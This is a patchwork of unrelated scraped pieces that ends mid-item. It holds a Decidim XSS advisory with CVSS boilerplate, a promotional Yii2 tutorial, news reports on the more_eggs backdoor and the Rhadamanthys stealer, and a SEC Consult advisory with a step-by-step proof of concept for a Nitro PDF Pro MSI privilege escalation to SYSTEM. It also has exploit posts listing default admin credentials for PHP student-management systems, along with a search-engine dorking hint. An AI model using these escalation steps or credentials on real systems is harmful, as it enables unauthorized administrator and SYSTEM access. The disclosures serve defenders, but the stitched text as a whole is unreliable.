### Impact

The version control feature used in resources is subject to potential cross-site scripting (XSS) attack through a malformed URL. 

### Workarounds

Not available

### References

OWASP ASVS v4.0.3-5.1.3

### Credits

This issue was discovered in a security audit organized by [Open Source Politics](https://opensourcepolitics.eu/) against Decidim done during July 2025.  

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-cc4g-m3g7-xmw8: Decidim has a cross-site scripting vulnerability in the version control page

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine…

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine a framework that can simplify the development process for you. We’re talking about Yii Framework (Yii2), a powerful tool designed to make web development easier and more efficient, especially for beginners and startups. The Yii Framework is used by thousands of already experienced developers around the world to build, maintain, and scale their web applications.

Successful examples of Yii Framework developments include products from companies such as SkillShare (an American online learning platform), iRobot (the company behind the popular Roomba vacuum cleaners uses this web platform for its iRobot Select membership website), HumHub (an open-source social networking software), Kia Corporation, and Serta (the last uses Yii for some of its web apps).

We have chosen these names with web development beginners in mind, who often find it difficult to choose the right tool to create their first web products. In this article, we will show you, as an inspiration and example, how easy it is to create your first web application using Yii Framework, a simple yet powerful tool for beginners. Here we go!

****Understanding the Basics of the Yii Framework****

The market offers a wide range of frameworks for developing various web applications and systems. The most popular ones are Laravel (known for its elegant syntax and robust features), Symfony (highly regarded for its flexibility and reusable components) and CodeIgniter (a lightweight PHP framework). Therefore, the first problem newcomers face is choosing an effective framework to start developing with. 

****How to decide on one that will help you get results quickly?** **

For reference, research (studying documentation, forums and tutorials), comparisons and experiments when selecting a framework for a web application take beginners from one to three months. But it turns out that this can be avoided. Using the Yii Framework as an example, here are the selection criteria that will help you choose your first web framework faster:

1.  **Ease of learning:** Yii has detailed documentation and built-in tools, making it a great choice for beginners. Unlike Symfony or Laravel, Yii offers a smoother learning curve.
2.  **Speed of development:** With built-in tools like Gii (code generator), Yii speeds up application creation, which is especially important for startups and small projects.
3.  **Security**: Yii offers built-in defences against SQL injection, XSS attacks, and CSRF, making it a safe choice for building applications.
4.  **Scalability**: This framework also supports modularity, making it easy to expand the application as your business grows.
5.  **Performance**: Yii2 is known for its speed and efficiency, making it a great solution for applications with high-performance requirements.

Draw your conclusion. If you’re new to startup development, choose a tool that’s simple, fast, and scalable. The DEV Community lists the 30 best web development frameworks, including React.js, Angular, Vue.js, Django, and others. But keep in mind that Yii is the Swiss Army knife for web development. It has everything you need to get started, according to SECL Group experts.

****Step-by-Step Guide to Building Your First Web Application with Yii Framework****

It can be difficult for beginners to start web development without a clear plan. In general, a plan includes installing the Yii framework, setting up the environment, and building a basic application. But because a web product requires different approaches to documentation, licensing, and security, the following step-by-step guide will help you navigate the different approaches and avoid common mistakes. 

The unified template below can be adapted to create different types of applications (e-commerce, online learning, drone control, social media) based on any Model-View-Controller (MVC) by following the same steps.

****Step 1: Install Yii Framework****

Use the command to set it up:

*   Code: composer create-project –prefer-dist yiisoft/yii2-app-basic
    *   _Example code_ de-commerce: composer create-project –prefer-dist yiisoft/yii2-app-basic ecommerce
    *   For online learning: composer create-project –prefer-dist yiisoft/yii2-app-basic online-learning

****Step 2: Set Up the Database****

*   Create a database and configure the connection in a file config/db.php. Here – specify the connection parameters.

**Tasks:**

1.  Create a database for the application.
2.  Specify connection parameters in the configuration (host, dbname, username, password).

**Note**

At this point, beginners should make sure that a DBMS (such as MySQL) is installed to create the new database. Also, check the connection before starting the migration. In context: if errors occur, check the log files — make sure the database server is running.

****Step 3: Create Models****

*   Generating models for the main entities of the system. Depending on the application type, use the following commands:

_Sample code for e-commerce:_

*   ./yii gii/model –tableName=product –modelClass=Product 
*   ./yii gii/model –tableName=category –modelClass=Category 
*   ./yii gii/model –tableName=order –modelClass=Order 

_Example for online learning:_

*   ./yii gii/model –tableName=course –modelClass=Course 
*   ./yii gii/model –tableName=user –modelClass=User 
*   ./yii gii/model –tableName=enrollment –modelClass=Enrollment 

****Note to beginners****

At this step, it is important to define the main entities (e.g. products, categories, orders for e-commerce), create models using Gii, customize models and strictly follow validation rules; the latter ensures data integrity.

****Step 4: Generate CRUD Operations****

*   Generate create, read, update, and delete (CRUD) operations for each model.
*   Code: ./yii gii/crud –modelClass=app\\models\\<ModelClass>

_**E-commerce example:**_

*   ./yii gii/crud –modelClass=app\\models\\Product 
*   ./yii gii/crud –modelClass=app\\models\\Category 
*   ./yii gii/crud –modelClass=app\\models\\Order 

_**Example for controlling drones:**_

*   ./yii gii/crud –modelClass=app\\models\\Drone 
*   ./yii gii/crud –modelClass=app\\models\\Flight 
*   ./yii gii/crud –modelClass=app\\models\\User 

****Step 5: Customize Views and Controllers****

*   Modify automatically generated views and controllers to adapt them to your application’s business logic.

_**Example:**_

*   For e-commerce: add logic for displaying products by category, adding products to the cart.
*   For online learning: configure the display of courses, registration of students for courses.

****Step 6: Implement Additional Features****

*   Add specific features depending on the type of application.
    *   **E-commerce**:  
        Integration of payment systems (PayPal, Stripe), ensuring data security (SSL, authentication).
    *   **Drone Control**:  
        Implementation of real-time tracking, integration of maps and GPS.
    *   **Social media**:  
        Adding user profiles, messaging systems, friend requests.

****Step 7: Test and Deploy****

*   Check the functionality of the application and deploy it on the server. Enable functional tests, test user interface and system performance.

1.  **Testing**: Make sure all functions are working correctly.
2.  **Deploy**: Deploy the application on your chosen hosting (for example, VPS or cloud platforms).

But more than just a how-to guide, this step-by-step tutorial is an inspiration. With Yii2, you can launch your first application in just a few steps, thanks to built-in tools and ready-made templates. It’s about how Yii provides a ready-made framework for a quick start: It is a code generator that automates the creation of code, databases, and more. Get started with “The Definitive Guide to Yii 2.0.” 

****Optimizing and Scaling Your Yii Application****

Even before they realize the value of building their first Yii application, optimistic newcomers worry about its ability to scale as their business grows. Remember: This web development platform is built for scalable applications, so you can easily add new features as your project or technical needs grow. This feature makes it possible to use the Yii2 to develop small websites as well as large enterprise systems.

For the more advanced ones, here’s a list of essential monitoring and profiling tools that can help you track the performance of your Yii application to ensure it scales seamlessly:

1.  **New Relic**: APM, real-time performance monitoring.
2.  **Blackfire:** PHP code profiling, tuning.
3.  **Xdebug:** Code-level debugging and profiling.
4.  **Prometheus + Grafana:** Collect and visualize real-time metrics.
5.  **Sentry:** Error and exception monitoring.
6.  **Elastic APM**: Request tracing and performance monitoring.
7.  **Tideways:** Profiling and performance metrics.
8.  **Datadog:** Comprehensive infrastructure and application monitoring.
9.  **PHP-FPM Status Page**: PHP process health monitoring.
10.  **AppDynamics:** Full stack monitoring and business metrics.

****Bottom line****

The Yii Framework is a powerful tool for building your first web applications. Simplicity, built-in tools, and scalable projects are its strengths. Community support and extensive documentation make this framework accessible to learn and use, even if you are just starting your web development journey.

****Answers to common objections:****

*   “Code generators limit flexibility” — Yii2 makes it easy to manually customize the generated code.
*   “I’m not sure I can scale a project on Yii” — Yii2 supports scaling with minimal effort.

Follow the suggested step-by-step guide and build your first web application on Yii Framework today!

1.  Top Software Development Outsourcing Trends
2.  Practices for Optimizing Web Development Standards
3.  Salesforce Case Classification using Text Fields Framework
4.  Power of Cloud App Development and DevOps for Businesses
5.  Top Benefits of Using Flutter for Cross-Platform App Development

Building Your First Web Application with Yii Framework

The FIN6 group is the likely culprit behind a spear-phishing campaign that demonstrates a shift in tactics, from targeting job seekers to going after those who hire.

Source: Kay Roxby via Alamy Stock Photo

A long-active threat group known for targeting multinational financial organizations has been impersonating job seekers in order to target talent recruiters. The method is a spear-phishing campaign spreading the "more\_eggs" backdoor, which is capable of executing secondary malware payloads.

Researchers from Trend Micro discovered campaign distributing the JScript backdoor, which is part of a malware-as-a-service (MaaS) toolkit called Golden Chickens, they revealed in analysis published this week published this week. They believe that the campaign is likely the work of FIN6, which is known for using the backdoor to target their victims. However, Trend Micro emphasized that the nature of the malware being a part of an MaaS package "blurs the lines between different threat actors" and thus makes precise attribution difficult.

FIN6 has been known in the past to pose as recruitment officers to target job seekers, but it appears to be "moving from posing as fake recruiters to now masquerading as fake job applicants" in a shift in tactics, Trend Micro researchers wrote in a blog post about the attacks.

Trend Micro identified the campaign when an employee who works as a talent search lead at a customer in the engineering sector downloaded a fake resume from a purported job applicant for a sales engineer position. The downloaded file executed a malicious .lnk file that resulted in a more\_eggs infection.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

"A spear-phishing email was initially sent from allegedly from 'John Cboins' using a Gmail address to a senior executive at the company," the researchers wrote. That email contained no attachments or URLs but instead was a social engineering ploy demonstrating "that the threat actor was attempting to gain the user's confidence," they wrote.

Soon after that communication, a recruitment officer downloaded what was supposed to be a resume, John Cboins.zip, from a URL using Google Chrome, though "it was not determined where this user obtained the URL," the researchers noted.

Further investigation of the URL revealed what appeared to be a typical website of a job applicant that even utilizes a CAPTCHA test and would not likely raise suspicions, thus capable of easily deceiving an unsuspecting recruiter into thinking he or she was corresponding with a legitimate candidate, they said.

**Same Payload, Different Nesting Methods**

Various security researchers have observed more\_eggs being used in attacks as early as 2017 against a variety of targets, including Russian financial institutions and mining firms, and other multinational organizations. As mentioned, more\_eggs is part of the Golden Chickens toolkit, which is distributed by Venom Spider, an underground MaaS provider also known as badbullzvenom, according to Trend Micro.

Related:Zimbra RCE Vuln Under Attack Needs Immediate Patching

While the backdoor is historically a common denominator among different threat campaigns by Venom Spider, the methods used for distributing the malware vary. Some attacks involved phishing schemes with malicious documents that contained JavaScript and PowerShell scripts, while others used LinkedIn and email to lure employees with fake job offers, leading them to malicious domains that host malicious .zip files, the researchers noted.

Attackers also have used phishing emails to distribute .zip files disguised as images to initiate a more\_eggs infection, while a June campaign again leveraged LinkedIn to trick recruiters into accessing a fake job resume site that distributed the malware as a malicious .lnk file.

There appear to be two active campaigns currently spreading the malware that target victims who "are in roles that attackers could leverage to identify valuable assets and have higher potential for financial gain," the researchers wrote.

**Prevent Hatching of "More\_Eggs"**

Traditional anti-malware solutions should immediately detect and eliminate an infection by more\_eggs on a corporate network. However, factors such as an organization’s operational needs, human fallibility, and potential misconfigurations can pose a risk of the malware slipping past these detections, according to Trend Micro.

Related:Retail & Hospitality ISAC Announces Pam Lindemoen As New CSO and VP

"The advanced social engineering techniques employed — such as using a convincing website and a malicious file disguised as a resume to start the infection — underscore the critical need for organizations to maintain continuous vigilance," the researchers wrote. "It is imperative that defenders implement robust threat detection measures and foster a culture of cybersecurity awareness to effectively combat these evolving threats."

Trend Micro shared various indicators of compromise (IoCs) related to the campaigns in the post. Organizations with managed detection and response (MDR) systems in place can use them to set up custom filters and models tailored to detect a specific threat like more\_eggs that then can be fed to a security playbook to automate response to an alert, according to the post.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Cyberattackers Use HR Targets to Lay More_Eggs Backdoor

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition."
"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition."

"This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in cryptocurrencies," Recorded Future's Insikt Group said in an analysis of version 0.7.0 of the malware.

"The malware can recognize seed phrase images on the client side and send them back to the command-and-control (C2) server for further exploitation."

First discovered in the wild in September 2022, Rhadamanthys has emerged as one of the most potent information stealers that are advertised under the malware-as-a-service (MaaS) model, alongside Lumma and others.

The malware continues to have an active presence despite suffering bans from underground forums like Exploit and XSS for targeting entities within Russia and the former Soviet Union, with its developer, who goes by the name "kingcrete" (aka "kingcrete2022"), finding ways to market the new versions on Telegram, Jabber, and TOX.

The cybersecurity company, which is set to be acquired by Mastercard for $2.65 billion, said the stealer is sold on a subscription basis for $250 per month (or $550 for 90 days), allowing its customers to harvest a wide range of sensitive information from compromised hosts.

This includes system information, credentials, cryptocurrency wallets, browser passwords, cookies, and data stored in various applications, while simultaneously taking steps to complicate analysis efforts within sandboxed environments.

Version 0.7.0, the most recent version of Rhadamanthys released in June 2024, significantly improves upon its predecessor 0.6.0, which came out in February 2024.

It comprises a "complete rewrite of both client-side and server-side frameworks, improving the program's execution stability," Recorded Future noted. "Additionally, 30 wallet-cracking algorithms, AI-powered graphics, and PDF recognition for phrase extraction were added. The text extraction capability was enhanced to identify multiple saved phrases."

Also included is a feature to allow threat actors to run and install Microsoft Software Installer(MSI) files in an apparent effort to evade detection by security solutions installed on the host. It further contains a setting to prevent re-execution within a configurable time frame.

Rhadamanthys's high-level infection chain

A noteworthy aspect of Rhadamanthys is its plugin system that can augment its capabilities with keylogger, cryptocurrency clipper, and reverse proxy functionality.

"Rhadamanthys is a popular choice for cybercriminals," Recorded Future said. "Coupled with its rapid development and innovative new features, it is a formidable threat all organizations should be aware of."

The development comes as Google-owned Mandiant detailed Lumma Stealer's use of customized control flow indirection to manipulate the execution of the malware.

"This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections," researchers Nino Isakovic and Chuong Dong said.

Rhadamanthys and Lumma, alongside other stealer malware families like Meduza, StealC, Vidar, and WhiteSnake, have also been found releasing updates in recent weeks to collect cookies from the Chrome web browser, effectively bypassing newly introduced security mechanisms like app-bound encryption.

On top of that, the developers behind the WhiteSnake Stealer have added the ability to extract CVC codes from credit cards stored in Chrome, highlighting the ever-evolving nature of the malware landscape.

That's not all. Researchers have identified an Amadey malware campaign that deploys an AutoIt script, which then launches the victim's browser in kiosk mode to force them to enter their Google account credentials. The login information is stored in the browser's credential store on disk for subsequent harvesting by stealers such as StealC.

These ongoing updates also follow the discovery of new drive-by download campaigns that deliver information stealers by tricking users into manually copying and executing PowerShell code to prove they are human by means of a deceptive CAPTCHA verification page.

As part of the campaign, users searching for video streaming services on Google are redirected to malicious URL that urges them to press the Windows button + R to launch the Run menu, paste an encoded PowerShell command, and execute it, according to CloudSEK, eSentire, Palo Alto Networks Unit 42, and Secureworks.

The attack, which ultimately delivers stealers such as Lumma, StealC, and Vidar, is a variant of the ClickFix campaign documented in recent months by ReliaQuest, Proofpoint, McAfee Labs, and Trellix.

"This novel attack vector poses significant risk, as it circumvents browser security controls by opening a command prompt," Secureworks said. "The victim is then directed to execute unauthorized code directly on their host."

Phishing and malvertising campaigns have also been observed distributing Atomic macOS Stealer (AMOS), Rilide, as well as a new variant of a stealer malware called Snake Keylogger (aka 404 Keylogger or KrakenKeylogger).

Furthermore, information stealers like Atomic, Rhadamanthys, and StealC have been at the heart of over 30 scam campaigns orchestrated by a cybercrime gang known as Marko Polo to conduct cryptocurrency theft across platforms by impersonating legitimate brands in online gaming, virtual meetings and productivity software, and cryptocurrency.

"Marko Polo primarily targets gamers, cryptocurrency influencers, and software developers via spear-phishing on social media — highlighting its focus on tech-savvy victims," Recorded Future said, adding "likely tens of thousands of devices have been compromised globally."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition

Pagekit 1.0.18 is vulnerable to Cross Site Scripting (XSS) in index.php/admin/site/widget.

GHSA-xw32-6422-frqm: Pagekit Cross-site Scripting vulnerability

The Nitro PDF Pro application uses a .msi installer file (embedded into an executable .exe installer file) for installation. The MSI installer uses custom actions in repair mode in an unsafe way. Attackers with low-privileged system access to a Windows system where Nitro PDF Pro is installed, can exploit the cached MSI installer's custom actions to effectively escalate privileges and get a command prompt running in context of NT AUTHORITY\SYSTEM. Versions prior to 14.26.1.0 and 13.70.8.82 and affected.

SEC Consult Vulnerability Lab Security Advisory < 20240930-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI Installer  
            product: Nitro PDF Pro  
 vulnerable version: <14.26.1.0  
                     <13.70.8.82  
      fixed version: 14.26.1.0 or higher  
                     13.70.8.82 or higher  
         CVE number: CVE-2024-35288  
             impact: high  
           homepage: https://www.gonitro.com/  
              found: 2023-12-19  
                 by: Sandro Einfeldt  
                     Michael Baer (Office Munich)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are on a mission to deliver a one-of-a-kind platform that accelerates   
document productivity for businesses around the world.

Nitro was born in a bustling Melbourne laneway back in 2005. It started   
with a team of three, a single product and a goal to provide the world   
with better tools for everyday work. Our team now spans the globe and   
works with over half of the Fortune 500, but we haven't strayed too far   
from our roots. We put our customers, employees, and communities at the   
center of everything we do."

Source: https://www.gonitro.com/about/our-story

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)   
The Nitro PDF Pro application uses a .msi installer file (embedded into an   
executable .exe installer file) for installation. The MSI installer uses custom   
actions in repair mode in an unsafe way. Attackers with low-privileged system   
access to a Windows system where Nitro PDF Pro is installed, can exploit the   
cached MSI installer's custom actions to effectively escalate privileges and get   
a command prompt running in context of NT AUTHORITY\SYSTEM. 

Note:   
This attack does not work using a recent version of the Edge Browser or   
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be   
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)  
After the installation of the software in standard configuration, any low-  
privileged user can access the cached (randomly named) .msi file in the   
following directory:

C:\Windows\Installer

A low privileged attacker can start the installer in repair mode   
(which is then running with SYSTEM privileges) without UAC popping up,   
by using the following command:

msiexec.exe /fa C:\Installer\<installer name>.msi

At the end of the repair process, three sub-processes (certutil.exe), called   
by MSI custom actions, perform the following operations:

[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority_2021-2036.cer"  

The previously mentioned operations get executed in a conhost.exe window in   
the context of NT AUTHORITY\SYSTEM. The attacker can use the appearing   
conhost.exe windows to get an elevated command prompt. Therefore, the attacker   
has to interrupt the execution flow of one of the certutil operations before   
the conhost.exe window closes. This can be done by locking the file operations   
on one of the following files:  

notarius-root-certificate-authority.cer  
notarius-certificate-authority.cer   
notarius-root-certificate-authority_2021-2036.cer

For this purpose, the attacker can use SetOpLock.exe from the following source:

https://github.com/googleprojectzero/symboliclink-testing-tools

To lock all operations on one of the previously mentioned files, the attacker  
has to use the following syntax:

while ($true) {  
   .\SetOpLock.exe <Path> x   
}

For example, to lock the operations on the first of the mentioned files, the   
following command loop can be used:

while ($true) {  
  .\SetOpLock.exe "C:\Program Files\Nitro\PDF Pro\14\notarius-root-certificate-authority.cer" x   
}

The tool will lock any operation on the file until the attacker presses Enter.  
While executing the previously mentioned msiexec-command, multiple operation  
locks will get triggered. The attacker has to skip multiple of them (by  
pressing Enter) until a conhost.exe window opens. The conhost.exe process is   
running with SYSTEM privileges and can be used to escalate privileges. The   
following steps have to be conducted:

1. Right click on the top bar of the conhost.exe window.  
2. Click on "Properties".  
3. Under options, click on the "Legacyconsolemode" link.  
4. Open the link with a browser other than Internet Explorer or Edge (both   
   don't open as SYSTEM in Windows 11).  
5. In the opened browser window press the key combination "CTRL+o".  
6. Type "C:\Windows\System32\cmd.exe" in the top bar and press Enter.

A command prompt should open with the user permission context of   
NT AUTHORITY\SYSTEM. The privileges have been escalated and the system is   
fully compromised.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* Nitro PDF Pro 14.18.1.41

According to the vendor, version branch 13 is also affected. The vendor  
confirmed that the following versions are vulnerable:

* Nitro PDF Pro <14.26.1.0  
* Nitro PDF Pro <13.70.8.82

Vendor contact timeline:  
------------------------  
2023-12-22: Contacting vendor through security@gonitro.com; asking for PGP key.  
            No response.  
2024-01-11: Asking whether our email was received  
2024-01-15: Vendor response: high workload, requesting security advisory,  
            PGP key will be shared in another email.   
2024-01-16: No PGP key received, asking again.  
2024-01-17: Sending encrypted security advisory.  
2024-01-30: Asking for a status update.  
2024-02-01: Vendor is currently investigating the issue to ensure it applies  
            to the latest version of the Pro software.  
2024-02-12: Vendor asking for tested Windows version.  
2024-02-13: Tested with Windows 10, referenced advisory information to only  
            use Firefox or Chrome browser, not Edge/IE.  
2024-03-05: Asking for a status update, if the issue could be reproduced, whether  
            we should reserve a CVE number.  
2024-03-07: Vendor will provide update in a few days, few issues in the queue.  
            Will ask internally regarding CVE.  
2024-04-08: Asking for status update. Setting advisory disclosure date  
            to 17th April.  
2024-04-08: Vendor was unable to reproduce issue, asking for a video to  
            verify the issue.  
2024-04-09: Providing POC video to the vendor.  
2024-04-11: Vendor still unable to reproduce.  
            Suggesting short call to demonstrate the issue; no response.  
2024-04-16: Asking how to proceed now.  
            Vendor: was now able to reproduce the issue on Windows 10,  
            patch implementation will be expedited.  
            Telling the vendor that we will wait for the patch, asking  
            if they reserve a CVE.  
2024-05-02: Vendor: CVE is being requested, patch is planned as soon as   
            possible.  
2024-05-02: Confirming advisory release after patch is available and   
            other necessary details (fixed version number, CVE, etc).  
2024-05-21: Vendor is still waiting for CVE.  
2024-05-22: Asking whether the issue is otherwise fixed, asking for version  
            number etc; No response.  
2024-06-17: Asking for status update again, regarding patch & CVE.  
            Fix is completed for current version 14.x, preparing a patch, but  
            also checking previous versions.  
2024-06-21: Vendor informs us that version 13 is also affected which takes  
            more time to backport.   
2024-06-24: Giving more time to patch and coordinate release versions.   
            Questions about CVE.  
2024-06-24: Vendor responds that CVE-2024-35288 can be used.  
2024-07-15: Vendor releases version 14.26.1.0 which includes the fix for v14.  
2024-09-17: Vendor informs us that security update for v13 is scheduled for  
            25th September (seems we did not receive this email).  
2024-09-23: Vendor following up regarding patch schedule & acknowledgement.  
2024-09-24: Confirming receipt of email and patch day, our advisory will be  
            scheduled for early next week.  
2024-09-24: Vendor provides affected version numbers.  
2024-09-25: Asking vendor for clarification regarding version numbers.  
2024-09-25: Vendor sends version numbers for the fix (13.70.8.82, 14.26.1.0)  
2024-09-30: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides a patch in version 13.70.8.82 and 14.26.1.0 which can be  
downloaded from the following URL:  
https://www.gonitro.com/product-details/downloads/pdf-pro

The vendor released a security advisory as well:  
https://www.gonitro.com/security/updates

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Sandro Einfeldt, Michael Baer, Johannes Greil / @2024

Nitro PDF Pro Local Privilege Escalation

An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

VICIdial Authenticated Remote Code Execution

Student Study Center Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Student Study Center Management System 1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Study Center Management System 1.0 Insecure Settings

Student Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Management System v1.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Management System 1.0 Insecure Settings

Student Attendance Management System version 1.0 suffers from a PHP code injection vulnerability.

